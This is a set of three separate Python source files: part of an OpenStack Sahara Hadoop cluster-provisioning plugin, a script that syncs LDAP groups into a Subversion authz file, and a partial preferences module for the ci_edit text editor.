in utils.get_node_groups(cluster, "oozie")])
if oozie_count > 1:
raise ex.InvalidComponentCountException("oozie", _('0 or 1'),
oozie_count)
hive_count = sum([ng.count for ng
in utils.get_node_groups(cluster, "hiveserver")])
if jt_count == 0:
tt_count = sum([ng.count for ng
in utils.get_node_groups(cluster, "tasktracker")])
if tt_count > 0:
raise ex.RequiredServiceMissingException(
"jobtracker", required_by="tasktracker")
if oozie_count > 0:
raise ex.RequiredServiceMissingException(
"jobtracker", required_by="oozie")
if hive_count > 0:
raise ex.RequiredServiceMissingException(
"jobtracker", required_by="hive")
if hive_count > 1:
raise ex.InvalidComponentCountException("hive", _('0 or 1'),
hive_count)
def configure_cluster(self, cluster):
instances = utils.get_instances(cluster)
self._setup_instances(cluster, instances)
def start_namenode(self, cluster):
nn = vu.get_namenode(cluster)
self._start_namenode(nn)
@cpo.event_wrapper(
True, step=utils.start_process_event_message("NameNode"))
def _start_namenode(self, nn_instance):
with remote.get_remote(nn_instance) as r:
run.format_namenode(r)
run.start_processes(r, "namenode")
def start_secondarynamenodes(self, cluster):
snns = vu.get_secondarynamenodes(cluster)
if len(snns) == 0:
return
cpo.add_provisioning_step(
cluster.id,
utils.start_process_event_message("SecondaryNameNodes"),
len(snns))
for snn in snns:
self._start_secondarynamenode(snn)
@cpo.event_wrapper(True)
def _start_secondarynamenode(self, snn):
run.start_processes(remote.get_remote(snn), "secondarynamenode")
def start_jobtracker(self, cluster):
jt = vu.get_jobtracker(cluster)
if jt:
self._start_jobtracker(jt)
@cpo.event_wrapper(
True, step=utils.start_process_event_message("JobTracker"))
def _start_jobtracker(self, jt_instance):
run.start_processes(remote.get_remote(jt_instance), "jobtracker")
def start_oozie(self, cluster):
oozie = vu.get_oozie(cluster)
if oozie:
self._start_oozie(cluster, oozie)
@cpo.event_wrapper(
True, step=utils.start_process_event_message("Oozie"))
def _start_oozie(self, cluster, oozie):
nn_instance = vu.get_namenode(cluster)
with remote.get_remote(oozie) as r:
if c_helper.is_mysql_enable(cluster):
run.mysql_start(r, oozie)
run.oozie_create_db(r)
run.oozie_share_lib(r, nn_instance.hostname())
run.start_oozie(r)
LOG.info(_LI("Oozie service at {host} has been started").format(
host=nn_instance.hostname()))
def start_hiveserver(self, cluster):
hs = vu.get_hiveserver(cluster)
if hs:
self._start_hiveserver(cluster, hs)
@cpo.event_wrapper(
True, step=utils.start_process_event_message("HiveServer"))
def _start_hiveserver(self, cluster, hive_server):
oozie = vu.get_oozie(cluster)
with remote.get_remote(hive_server) as r:
run.hive_create_warehouse_dir(r)
run.hive_copy_shared_conf(
r, edp.get_hive_shared_conf_path('hadoop'))
if c_helper.is_mysql_enable(cluster):
if not oozie or hive_server.hostname() != oozie.hostname():
run.mysql_start(r, hive_server)
run.hive_create_db(r, cluster.extra['hive_mysql_passwd'])
run.hive_metastore_start(r)
LOG.info(_LI("Hive Metastore server at {host} has been "
"started").format(
host=hive_server.hostname()))
def start_cluster(self, cluster):
self.start_namenode(cluster)
self.start_secondarynamenodes(cluster)
self.start_jobtracker(cluster)
self._start_tt_dn_processes(utils.get_instances(cluster))
self._await_datanodes(cluster)
LOG.info(_LI("Hadoop services in cluster {cluster} have been started")
.format(cluster=cluster.name))
self.start_oozie(cluster)
self.start_hiveserver(cluster)
LOG.info(_LI('Cluster {cluster} has been started successfully')
.format(cluster=cluster.name))
self._set_cluster_info(cluster)
@cpo.event_wrapper(
True, step=_("Await %s start up") % "DataNodes", param=('cluster', 1))
def _await_datanodes(self, cluster):
datanodes_count = len(vu.get_datanodes(cluster))
if datanodes_count < 1:
return
l_message = _("Waiting on %s datanodes to start up") % datanodes_count
LOG.info(l_message)
with remote.get_remote(vu.get_namenode(cluster)) as r:
poll_utils.plugin_option_poll(
cluster, run.check_datanodes_count,
c_helper.DATANODES_STARTUP_TIMEOUT, l_message, 1, {
'remote': r,
'count': datanodes_count})
def _generate_hive_mysql_password(self, cluster):
extra = cluster.extra.to_dict() if cluster.extra else {}
password = extra.get('hive_mysql_passwd')
if not password:
password = six.text_type(uuid.uuid4())
extra['hive_mysql_passwd'] = password
conductor.cluster_update(context.ctx(), cluster, {'extra': extra})
return password
def _extract_configs_to_extra(self, cluster):
oozie = vu.get_oozie(cluster)
hive = vu.get_hiveserver(cluster)
extra = dict()
if hive:
extra['hive_mysql_passwd'] = self._generate_hive_mysql_password(
cluster)
for ng in cluster.node_groups:
extra[ng.id] = {
'xml': c_helper.generate_xml_configs(
cluster, ng, extra['hive_mysql_passwd'] if hive else None),
'setup_script': c_helper.generate_setup_script(
ng.storage_paths(),
c_helper.extract_environment_confs(ng.configuration()),
append_oozie=(
oozie and oozie.node_group.id == ng.id)
)
}
if c_helper.is_data_locality_enabled(cluster):
topology_data = th.generate_topology_map(
cluster, CONF.enable_hypervisor_awareness)
extra['topology_data'] = "\n".join(
[k + " " + v for k, v in topology_data.items()]) + "\n"
return extra
def decommission_nodes(self, cluster, instances):
tts = vu.get_tasktrackers(cluster)
dns = vu.get_datanodes(cluster)
decommission_dns = False
decommission_tts = False
for i in instances:
if 'datanode' in i.node_group.node_processes:
dns.remove(i)
decommission_dns = True
if 'tasktracker' in i.node_group.node_processes:
tts.remove(i)
decommission_tts = True
nn = vu.get_namenode(cluster)
jt = vu.get_jobtracker(cluster)
if decommission_tts:
sc.decommission_tt(jt, instances, tts)
if decommission_dns:
sc.decommission_dn(nn, instances, dns)
def validate_scaling(self, cluster, existing, additional):
self._validate_existing_ng_scaling(cluster, existing)
self._validate_additional_ng_scaling(cluster, additional)
def scale_cluster(self, cluster, instances):
self._setup_instances(cluster, instances)
run.refresh_nodes(remote.get_remote(
vu.get_namenode(cluster)), "dfsadmin")
jt = vu.get_jobtracker(cluster)
if jt:
run.refresh_nodes(remote.get_remote(jt), "mradmin")
self._start_tt_dn_processes(instances)
def _start_tt_dn_processes(self, instances):
tt_dn_names = ["datanode", "tasktracker"]
instances = utils.instances_with_services(instances, tt_dn_names)
if not instances:
return
cpo.add_provisioning_step(
instances[0].cluster_id,
utils.start_process_event_message("DataNodes, TaskTrackers"),
len(instances))
with context.ThreadGroup() as tg:
for i in instances:
processes = set(i.node_group.node_processes)
tt_dn_procs = processes.intersection(tt_dn_names)
tg.spawn('vanilla-start-tt-dn-%s' % i.instance_name,
self._start_tt_dn, i, list(tt_dn_procs))
@cpo.event_wrapper(True)
def _start_tt_dn(self, instance, tt_dn_procs):
with instance.remote() as r:
run.start_processes(r, *tt_dn_procs)
@cpo.event_wrapper(True, step=_("Setup instances and push configs"),
param=('cluster', 1))
def _setup_instances(self, cluster, instances):
if (CONF.use_identity_api_v3 and CONF.use_domain_for_proxy_users and
vu.get_hiveserver(cluster) and
c_helper.is_swift_enable(cluster)):
cluster = proxy.create_proxy_user_for_cluster(cluster)
instances = utils.get_instances(cluster)
extra = self._extract_configs_to_extra(cluster)
cluster = conductor.cluster_get(context.ctx(), cluster)
self._push_configs_to_nodes(cluster, extra, instances)
def _push_configs_to_nodes(self, cluster, extra, new_instances):
all_instances = utils.get_instances(cluster)
new_ids = set([instance.id for instance in new_instances])
with context.ThreadGroup() as tg:
for instance in all_instances:
if instance.id in new_ids:
tg.spawn('vanilla-configure-%s' % instance.instance_name,
self._push_configs_to_new_node, cluster,
extra, instance)
else:
tg.spawn('vanilla-reconfigure-%s' % instance.instance_name,
self._push_configs_to_existing_node, cluster,
extra, instance)
def _push_configs_to_new_node(self, cluster, extra, instance):
ng_extra = extra[instance.node_group.id]
private_key, public_key = c_helper.get_hadoop_ssh_keys(cluster)
files = {
'/etc/hadoop/core-site.xml': ng_extra['xml']['core-site'],
'/etc/hadoop/mapred-site.xml': ng_extra['xml']['mapred-site'],
'/etc/hadoop/hdfs-site.xml': ng_extra['xml']['hdfs-site'],
'/tmp/sahara-hadoop-init.sh': ng_extra['setup_script'],
'id_rsa': private_key,
'authorized_keys': public_key
}
key_cmd = ('sudo mkdir -p /home/hadoop/.ssh/ && '
'sudo mv id_rsa authorized_keys /home/hadoop/.ssh && '
'sudo chown -R hadoop:hadoop /home/hadoop/.ssh && '
'sudo chmod 600 /home/hadoop/.ssh/{id_rsa,authorized_keys}')
with remote.get_remote(instance) as r:
# TODO(aignatov): sudo chown is wrong solution. But it works.
r.execute_command(
'sudo chown -R $USER:$USER /etc/hadoop'
)
r.execute_command(
'sudo chown -R $USER:$USER /opt/oozie/conf'
)
r.write_files_to(files)
r.execute_command(
'sudo chmod 0500 /tmp/sahara-hadoop-init.sh'
)
r.execute_command(
'sudo /tmp/sahara-hadoop-init.sh '
'>> /tmp/sahara-hadoop-init.log 2>&1')
r.execute_command(key_cmd)
if c_helper.is_data_locality_enabled(cluster):
r.write_file_to(
'/etc/hadoop/topology.sh',
f.get_file_text(
'plugins/vanilla/v1_2_1/resources/topology.sh'))
r.execute_command(
'sudo chmod +x /etc/hadoop/topology.sh'
)
self._write_topology_data(r, cluster, extra)
self._push_master_configs(r, cluster, extra, instance)
def _push_configs_to_existing_node(self, cluster, extra, instance):
node_processes = instance.node_group.node_processes
need_update = (c_helper.is_data_locality_enabled(cluster) or
'namenode' in node_processes or
'jobtracker' in node_processes or
'oozie' in node_processes or
'hiveserver' in node_processes)
if not need_update:
return
with remote.get_remote(instance) as r:
self._write_topology_data(r, cluster, extra)
self._push_master_configs(r, cluster, extra, instance)
def _write_topology_data(self, r, cluster, extra):
if c_helper.is_data_locality_enabled(cluster):
topology_data = extra['topology_data']
r.write_file_to('/etc/hadoop/topology.data', topology_data)
def _push_master_configs(self, r, cluster, extra, instance):
ng_extra = extra[instance.node_group.id]
node_processes = instance.node_group.node_processes
if 'namenode' in node_processes:
self._push_namenode_configs(cluster, r)
if 'jobtracker' in node_processes:
self._push_jobtracker_configs(cluster, r)
if 'oozie' in node_processes:
self._push_oozie_configs(ng_extra, r)
if 'hiveserver' in node_processes:
self._push_hive_configs(ng_extra, r)
def _push_namenode_configs(self, cluster, r):
r.write_file_to('/etc/hadoop/dn.incl',
utils.generate_fqdn_host_names(
vu.get_datanodes(cluster)))
def _push_jobtracker_configs(self, cluster, r):
r.write_file_to('/etc/hadoop/tt.incl',
utils.generate_fqdn_host_names(
vu.get_tasktrackers(cluster)))
def _push_oozie_configs(self, ng_extra, r):
r.write_file_to('/opt/oozie/conf/oozie-site.xml',
ng_extra['xml']['oozie-site'])
def _push_hive_configs(self, ng_extra, r):
files = {
'/opt/hive/conf/hive-site.xml':
ng_extra['xml']['hive-site']
}
r.write_files_to(files)
def _set_cluster_info(self, cluster):
nn = vu.get_namenode(cluster)
jt = vu.get_jobtracker(cluster)
oozie = vu.get_oozie(cluster)
info = {}
if jt:
ui_port = c_helper.get_port_from_config(
'MapReduce', 'mapred.job.tracker.http.address', cluster)
jt_port = c_helper.get_port_from_config(
'MapReduce', 'mapred.job.tracker', cluster)
info['MapReduce'] = {
'Web UI': 'http://%s:%s' % (jt.management_ip, ui_port),
'JobTracker': '%s:%s' % (jt.hostname(), jt_port)
}
if nn:
ui_port = c_helper.get_port_from_config('HDFS', 'dfs.http.address',
cluster)
nn_port = c_helper.get_port_from_config('HDFS', 'fs.default.name',
cluster)
info['HDFS'] = {
'Web UI': 'http://%s:%s' % (nn.management_ip, ui_port),
'NameNode': 'hdfs://%s:%s' % (nn.hostname(), nn_port)
}
if oozie:
# TODO(yrunts) change from hardcode value
info['JobFlow'] = {
'Oozie': 'http://%s:11000' % oozie.management_ip
}
ctx = context.ctx()
conductor.cluster_update(ctx, cluster, {'info': info})
def _get_scalable_processes(self):
return ["datanode", "tasktracker"]
def _validate_additional_ng_scaling(self, cluster, additional):
jt = vu.get_jobtracker(cluster)
scalable_processes = self._get_scalable_processes()
for ng_id in additional:
ng = g.get_by_id(cluster.node_groups, ng_id)
if not set(ng.node_processes).issubset(scalable_processes):
raise ex.NodeGroupCannotBeScaled(
ng.name, _("Vanilla plugin cannot scale nodegroup"
" with processes: %s") %
' '.join(ng.node_processes))
if not jt and 'tasktracker' in ng.node_processes:
raise ex.NodeGroupCannotBeScaled(
ng.name, _("Vanilla plugin cannot scale node group with "
"processes which have no master-processes run "
"in cluster"))
def _validate_existing_ng_scaling(self, cluster, existing):
scalable_processes = self._get_scalable_processes()
dn_to_delete = 0
for ng in cluster.node_groups:
if ng.id in existing:
if (ng.count > existing[ng.id] and "datanode" in
ng.node_processes):
dn_to_delete += ng.count - existing[ng.id]
if not set(ng.node_processes).issubset(scalable_processes):
raise ex.NodeGroupCannotBeScaled(
ng.name, _("Vanilla plugin cannot scale nodegroup"
" with processes: %s") %
' '.join(ng.node_processes))
dn_amount = len(vu.get_datanodes(cluster))
rep_factor = c_helper.get_config_value('HDFS', 'dfs.replication',
cluster)
if dn_to_delete > 0 and dn_amount - dn_to_delete < rep_factor:
raise ex.ClusterCannotBeScaled(
cluster.name, _("Vanilla plugin cannot shrink cluster because "
"it would be not enough nodes for replicas "
"(replication factor is %s)") % rep_factor)
def get_edp_engine(self, cluster, job_type):
if job_type in edp_engine.EdpOozieEngine.get_supported_job_types():
return edp_engine.EdpOozieEngine(cluster)
return None
def get_edp_job_types(self):
return edp_engine.EdpOozieEngine.get_supported_job_types()
def get_edp_config_hints(self, job_type):
return edp_engine.EdpOozieEngine.get_possible_job_config(job_type)
def get_open_ports(self, node_group):
cluster = node_group.cluster
ports = []
if "namenode" in node_group.node_processes:
ports.append(c_helper.get_port_from_config(
'HDFS', 'dfs.http.address', cluster))
ports.append(8020)
if "datanode" in node_group.node_processes:
ports.append(c_helper.get_port_from_config(
'HDFS', 'dfs.datanode.http.address', cluster))
ports.append(c_helper.get_port_from_config(
'HDFS', 'dfs.datanode.address', cluster))
ports.append(c_helper.get_port_from_config(
'HDFS', 'dfs.datanode.ipc.address', cluster))
if "jobtracker" in node_group.node_processes:
ports.append(c_helper.get_port_from_config(
'MapReduce', 'mapred.job.tracker.http.address', cluster))
ports.append(8021)
if "tasktracker" in node_group.node_processes:
ports.append(c_helper.get_port_from_config(
'MapReduce', 'mapred.task.tracker.http.address', cluster))
if "secondarynamenode" in node_group.node_processes:
ports.append(c_helper.get_port_from_config(
'HDFS', 'dfs.secondary.http.address', cluster))
if "oozie" in node_group.node_processes:
ports.append(11000)
if "hive" in node_group.node_processes:
ports.append(9999)
ports.append(10000)
return ports
def on_terminate_cluster(self, cluster):
proxy.delete_proxy_user_for_cluster(cluster)
|
|
#!/usr/bin/env python
#
# -*-python-*-
#
################################################################################
# License
################################################################################
# Copyright (c) 2006 Jeremy Whitlock. All rights reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
################################################################################
import ConfigParser, datetime, getpass, os, re, sys, tempfile
from optparse import OptionParser
try:
import ldap
except ImportError:
print("Unable to locate the 'ldap' module. Please install python-ldap. " \
"(http://python-ldap.sourceforge.net)")
sys.exit(1)
################################################################################
# Configuration Options
################################################################################
# This is the distinguished name used to bind to the LDAP server.
# [Example: CN=Jeremy Whitlock,OU=Users,DC=subversion,DC=thoughtspark,DC=org]
bind_dn = None
# This is the password for the user connecting to the LDAP server.
# [Example: pa55w0rd]
bind_password = None
# This is the fully-qualified url to the LDAP server.
# [Example: ldap://localhost:389]
url = None
# This is the distinguished name to where the group search will start.
# [Example: DC=subversion,DC=thoughtspark,DC=org]
base_dn = None
# This is the query/filter used to identify group objects.
# [Example: objectClass=group]
group_query = "objectClass=group"
# This is the attribute of the group object that stores the group memberships.
# [Example: member]
group_member_attribute = "member"
# This is the query/filter used to identify user objects.
# [Example: objectClass=user]
user_query = "objectClass=user"
# This is the attribute of the user object that stores the userid to be used in
# the authz file. [Example: cn]
userid_attribute = "cn"
# This is the CA certificate to use with SSL LDAP connection
cacert = None
# This is the fully-qualified path to the authz file to write to.
# [Example: /opt/svn/svn_authz.txt]
authz_path = None
################################################################################
# Runtime Options
################################################################################
# This indicates whether or not to output logging information
verbose = True
################################################################################
# Application Settings
################################################################################
application_name = "LDAP Groups to Subversion Authz Groups Bridge"
application_version = "1.0.3"
application_description = "The '%s' is a simple script that will query your " \
"directory server for group objects and create a " \
"representation of those groups in your Subversion " \
"authorization (authz) file." % application_name
################################################################################
# Business Logic
################################################################################
def bind():
"""This function will bind to the LDAP instance and return an ldapobject."""
if cacert:
ldap.set_option(ldap.OPT_X_TLS_CACERTFILE, cacert)
ldapobject = ldap.initialize(url)
ldapobject.bind(bind_dn, bind_password)
if verbose:
print("Successfully bound to %s..." % url)
return ldapobject
# bind()
def search_for_groups(ldapobject):
"""This function will search the LDAP directory for group definitions."""
groups = []
result_set = get_ldap_search_resultset(base_dn, group_query, ldapobject)
if (len(result_set) == 0):
if verbose:
print("The group_query %s did not return any results." % group_query)
return
for i in range(len(result_set)):
for entry in result_set[i]:
groups.append(entry)
if verbose:
print("%d groups found." % len(groups))
return groups
# search_for_groups()
def get_ldap_search_resultset(base_dn, group_query, ldapobject):
"""This function will return a query result set."""
result_set = []
result_id = ldapobject.search(base_dn, ldap.SCOPE_SUBTREE, group_query)
while 1:
result_type, result_data = ldapobject.result(result_id, 0)
if (result_type == ldap.RES_SEARCH_ENTRY):
result_set.append(result_data)
elif (result_type == ldap.RES_SEARCH_RESULT):
break
return result_set
# get_ldap_search_resultset()
def create_group_model(groups, ldapobject):
"""This function will take the list of groups created by search_for_groups()
and will create a group membership model for each group."""
memberships = []
groupmap = create_group_map(groups)
if groups:
for group in groups:
group_members = []
members = []
if group[1].has_key(group_member_attribute):
group_members = group[1][group_member_attribute]
# We need to check for if the member is a group and handle specially
for member in group_members:
try:
try:
user = get_ldap_search_resultset(member, user_query, ldapobject)
except:
#error means likely that member isn't a fully OID, so run the search again
user = get_ldap_search_resultset(base_dn, "(&(%s=%s)(%s))" % (userid_attribute, member, user_query), ldapobject)
if (len(user) == 1):
# The member is a user
attrs = user[0][0][1]
if (attrs.has_key(userid_attribute)):
members.append(attrs[userid_attribute][0])
else:
if verbose:
print("[WARNING]: %s does not have the %s attribute..." \
% (user[0][0][0], userid_attribute))
elif (len(user) > 1):
# Check to see if this member is really a group
try:
mg = get_ldap_search_resultset(member, group_query, ldapobject)
except:
#error means likely that member isn't a fully OID, so run the search again
mg = get_ldap_search_resultset(base_dn, "(&(%s=%s)(%s))" % (group_member_attribute, member, group_query), ldapobject)
if (len(mg) == 1):
# The member is a group
members.append("GROUP:" + get_dict_key_from_value(groupmap,
mg[0][0][0]))
else:
if verbose:
print("[WARNING]: %s is a member of %s but is neither a group " \
"or a user." % (member, group[1]['cn'][0]))
except ldap.LDAPError, error_message:
if verbose:
print("[WARNING]: %s object was not found..." % member)
memberships.append(members)
return (groups, memberships)
# create_group_model()
def get_dict_key_from_value(dict, value):
"""Returns the key of the dictionary entry with the matching value."""
for k, v in dict.iteritems():
if (v == value):
return k
return None
# get_dict_key_from_value()
def create_group_map(groups):
groupmap = {}
dups = {}
if groups:
for group in groups:
cn = simplify_name(group[1]['cn'][0])
if (not groupmap.has_key(cn)):
groupmap[cn] = group[0]
else:
if (not dups.has_key(cn)):
dups[cn] = 1
else:
index = dups[cn]
dups[cn] = (index + 1)
groupmap[cn + str(dups[cn])] = group[0]
return groupmap
# create_group_map()
def simplify_name(name):
"""Creates an authz simple group name."""
return re.sub("\W", "", name)
# simplify_name()
def print_group_model(groups, memberships):
"""This function will write the groups and their members to a file."""
if not groups:
return
now = datetime.datetime.now()
header_start = "### Start generated content: " + application_name +" ("
header_middle = now.strftime("%Y/%m/%d %H:%M:%S")
header_end = ") ###"
header = header_start + header_middle + header_end
footer = "### End generated content: " + application_name + " ###"
file = None
tmp_fd, tmp_authz_path = tempfile.mkstemp()
if ((authz_path != None) and (authz_path != "None")):
if (os.path.exists(authz_path)):
file = open(authz_path, 'r')
tmpfile = open(tmp_authz_path, 'w')
# Remove previous generated content
inside_content = False
for line in file.readlines():
if (inside_content):
if (line.find(footer) > -1):
inside_content = False
else:
if (line.find(header_start) > -1):
inside_content = True
else:
tmpfile.write(line)
file.close()
tmpfile.close()
if (os.path.exists(tmp_authz_path)):
cp = ConfigParser.ConfigParser()
cp.read(tmp_authz_path)
if (not cp.has_section("groups")):
tmpfile = open(tmp_authz_path, 'a')
tmpfile.write("[groups]\n")
tmpfile.close()
else:
tmpfile = open(tmp_authz_path, 'a')
tmpfile.write("[groups]\n")
tmpfile.close()
needs_new_line = False
tmpfile = open(tmp_authz_path, 'r')
if (tmpfile.readlines()[-1].strip() != ''):
needs_new_line = True
tmpfile.close()
tmpfile = open(tmp_authz_path, 'a')
if (needs_new_line):
tmpfile.write("\n")
tmpfile.write(header + "\n")
groupmap = create_group_map(groups)
if groups:
for i in range(len(groups)):
if (i != 0):
tmpfile.write("\n")
short_name = simplify_name(get_dict_key_from_value(groupmap, groups[i][0]))
tmpfile.write(short_name + " = ")
for j in range(len(memberships[i])):
if (j != 0):
tmpfile.write(", ")
if (memberships[i][j].find("GROUP:") == 0):
tmpfile.write(memberships[i][j].replace("GROUP:","@"))
else:
tmpfile.write(memberships[i][j])
generate_legend(tmpfile, groups)
tmpfile.write("\n" + footer)
tmpfile.close()
if authz_path:
if (os.path.exists(authz_path + ".bak")):
os.remove(authz_path + ".bak")
if (os.path.exists(authz_path)):
os.rename(authz_path, authz_path + ".bak")
os.rename(tmp_authz_path, authz_path)
else:
tmpfile = open(tmp_authz_path, 'r')
for line in tmpfile.readlines():
print(line)
tmpfile.close()
os.remove(tmp_authz_path)
# print_group_model()
def generate_legend(output, groups):
"""This function will generate, and write, the legend to file."""
if groups:
output.write("\n")
output.write("\n###########################################################" +
"#####################\n")
output.write("########### " + application_name +" (Legend) ##########\n")
output.write("###########################################################" +
"#####################\n")
groupmap = create_group_map(groups)
for group in groups:
short_name = simplify_name(get_dict_key_from_value(groupmap, group[0]))
output.write("### " + short_name + " = " + str(group[0]) + "\n")
output.write("###########################################################" +
"#####################\n")
# generate_legend()
def load_cli_properties(parser):
"""This function will set the local properties based on cli arguments."""
global bind_dn
global bind_password
global url
global base_dn
global group_query
global group_member_attribute
global user_query
global userid_attribute
global authz_path
global verbose
global cacert
(options, args) = parser.parse_args(args=None, values=None)
bind_dn = options.bind_dn
bind_password = options.bind_password
url = options.url
base_dn = options.base_dn
group_query = options.group_query
group_member_attribute = options.group_member_attribute
user_query = options.user_query
userid_attribute = options.userid_attribute
authz_path = options.authz_path
verbose = options.verbose
cacert = options.cacert
# load_cli_properties()
def create_cli_parser():
"""Creates an OptionParser and returns it."""
usage = "usage: %prog [options]"
parser = OptionParser(usage=usage, description=application_description)
parser.add_option("-d", "--bind-dn", dest="bind_dn",
help="The DN of the user to bind to the directory with")
parser.add_option("-p", "--bind-password", dest="bind_password",
help="The password for the user specified with the " \
"--bind-dn")
parser.add_option("-l", "--url", dest="url",
help="The url (scheme://hostname:port) for the directory " \
"server")
parser.add_option("-b", "--base-dn", dest="base_dn",
help="The DN at which to perform the recursive search")
parser.add_option("-g", "--group-query", dest="group_query",
default="objectClass=group",
help="The query/filter used to identify group objects. " \
"[Default: %default]")
parser.add_option("-m", "--group-member-attribute",
dest="group_member_attribute", default="member",
help="The attribute of the group object that stores the " \
"group memberships. [Default: %default]")
parser.add_option("-u", "--user-query", dest="user_query",
default="objectClass=user",
help="The query/filter used to identify user objects. " \
"[Default: %default]")
parser.add_option("-i", "--userid_attribute", dest="userid_attribute",
default="cn",
help="The attribute of the user object that stores the " \
"userid to be used in the authz file. " \
"[Default: %default]")
parser.add_option("-c", "--cacert-path", dest="cacert",
help="The path to the CA CERT to validate certificate")
parser.add_option("-z", "--authz-path", dest="authz_path",
help="The path to the authz file to update/create")
parser.add_option("-q", "--quiet", action="store_false", dest="verbose",
default="True", help="Suppress logging information")
return parser
# create_cli_parser()
def are_properties_set():
"""This function will perform a simple test to make sure none of the
properties are 'None'."""
if (bind_dn == None):
return False
if (url == None):
return False
if (base_dn == None):
return False
if (group_query == None):
return False
if (group_member_attribute == None):
return False
if (user_query == None):
return False
if (userid_attribute == None):
return False
# bind_password is not checked since if not passed, the user will be prompted
# authz_path is not checked since it can be 'None' signifying stdout output
return True
# are_properties_set()
def get_unset_properties():
"""This function returns a list of unset properties necessary to run."""
unset_properties = []
if (bind_dn == None):
unset_properties += ['bind-dn']
if (url == None):
unset_properties += ['url']
if (base_dn == None):
unset_properties += ['base-dn']
if (group_query == None):
unset_properties += ['group-query']
if (group_member_attribute == None):
unset_properties += ['group-member-attribute']
if (user_query == None):
unset_properties += ['user-query']
if (userid_attribute == None):
unset_properties += ['userid-attribute']
return unset_properties
# get_unset_properties()
def main():
"""This function is the entry point for this script."""
# Create the OptionParser
parser = create_cli_parser()
# Attempt to load properties from the command line if necessary
if not are_properties_set():
load_cli_properties(parser)
if not are_properties_set():
print("There is not enough information to proceed.")
for prop in get_unset_properties():
print("'%s' was not passed" % prop)
print("")
parser.print_help()
parser.exit()
# Allow user to type in password if missing
global bind_password
if bind_password == None:
bind_password = getpass.getpass("Please provide the bind DN password: ")
ldapobject = None
groups = None
memberships = None
try:
ldapobject = bind()
except ldap.LDAPError, error_message:
print("Could not connect to %s. Error: %s " % (url, error_message))
sys.exit(1)
try:
groups = search_for_groups(ldapobject)
except ldap.LDAPError, error_message:
print("Error performing search: %s " % error_message)
sys.exit(1)
if groups and len(groups) == 0:
print("There were no groups found with the group_query you supplied.")
sys.exit(0)
try:
memberships = create_group_model(groups, ldapobject)[1]
except ldap.LDAPError, error_message:
print("Error creating group model: %s" % error_message)
sys.exit(1)
print_group_model(groups, memberships)
# main()
if __name__ == "__main__":
main()
|
|
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import curses
import io
import json
import os
import re
import sys
import app.default_prefs
import app.log
import app.regex
class Prefs:
def __init__(self):
self.prefsDirectory = "~/.ci_edit/prefs/"
prefs = app.default_prefs.prefs
self.color8 = app.default_prefs.color8
self.color16 = app.default_prefs.color16
self.color256 = app.default_prefs.color256
self.color = self.color256
self.dictionaries = prefs.get("dictionaries", [])
self.editor = prefs.get("editor", {})
self.devTest = prefs.get("devTest", {})
self.palette = prefs.get("palette", {})
self.startup = {}
self.status = prefs.get(u"status", {})
self.userData = prefs.get(u"userData", {})
self.__set_up_grammars(prefs.get(u"grammar", {}))
self.__set_up_file_types(prefs.get(u"fileType", {}))
self.init()
def load_prefs(self, fileName, category):
# Check the user home directory for preferences.
prefsPath = os.path.expanduser(
os.path.expandvars(
os.path.join(self.prefsDirectory, "%s.json" % (fileName,))
)
)
if os.path.isfile(prefsPath) and os.access(prefsPath, os.R_OK):
with io.open(prefsPath, "r") as f:
try:
additionalPrefs = json.loads(f.read())
app.log.startup(additionalPrefs)
category.update(additionalPrefs)
app.log.startup("Updated editor prefs from", prefsPath)
app.log.startup("as", category)
except Exception as e:
app.log.startup("failed to parse", prefsPath)
app.log.startup("error", e)
return category
def init(self):
self.editor = self.load_prefs("editor", self.editor)
self.status = self.load_prefs("status", self.status)
self.colorSchemeName = self.editor["colorScheme"]
if self.colorSchemeName == "custom":
# Check the user home directory for a color scheme preference. If
# found load it to replace the default color scheme.
self.color = self.load_prefs("color_scheme", self.color)
defaultColor = self.color["default"]
defaultKeywordsColor = self.color["keyword"]
defaultSpecialsColor = self.color["special"]
for k, v in self.grammars.items():
# Colors.
v["colorIndex"] = self.color.get(k, defaultColor)
if 0:
v["keywordsColor"] = curses.color_pair(
self.color.get(k + "_keyword_color", defaultKeywordsColor)
)
v["specialsColor"] = curses.color_pair(
self.color.get(k + "_special_color", defaultSpecialsColor)
)
app.log.info("prefs init")
def category(self, name):
return {
"color": self.color,
"editor": self.editor,
"startup": self.startup,
}[name]
def get_file_type(self, filePath):
if filePath is None:
return self.grammars.get("text")
name = os.path.split(filePath)[1]
fileType = self.nameToType.get(name)
if fileType is None:
fileExtension = os.path.splitext(name)[1]
fileType = self.extensions.get(fileExtension, "text")
return fileType
def tabs_to_spaces(self, fileType):
prefs = app.default_prefs.prefs.get(u"fileType", {})
if fileType is None or prefs is None:
return False
file_prefs = prefs.get(fileType)
return file_prefs and file_prefs.get(u"tabToSpaces")
def get_grammar(self, fileType):
return self.grammars.get(fileType)
def save(self, category, label, value):
app.log.info(category, label, value)
prefCategory = self.category(category)
prefCategory[label] = value
prefsPath = os.path.expanduser(
os.path.expandvars(
os.path.join(self.prefsDirectory, "%s.json" % (category,))
)
)
with io.open(prefsPath, "w", encoding=u"utf-8") as f:
try:
f.write(json.dumps(prefs[category]))
except Exception as e:
app.log.error("error writing prefs")
app.log.exception(e)
def _raise_grammar_not_found(self):
app.log.startup("Available grammars:")
for k, v in self.grammars.items():
app.log.startup(" ", k, ":", len(v))
raise Exception('missing grammar for "' + grammarName + '" in prefs.py')
def __set_up_grammars(self, defaultGrammars):
self.grammars = {}
# Arrange all the grammars by name.
for k, v in defaultGrammars.items():
v["name"] = k
self.grammars[k] = v
# Compile regexes for each grammar.
for k, v in defaultGrammars.items():
if 0:
# keywords re.
v["keywordsRe"] = re.compile(
app.regex.join_re_word_list(
v.get("keywords", []) + v.get("types", [])
)
)
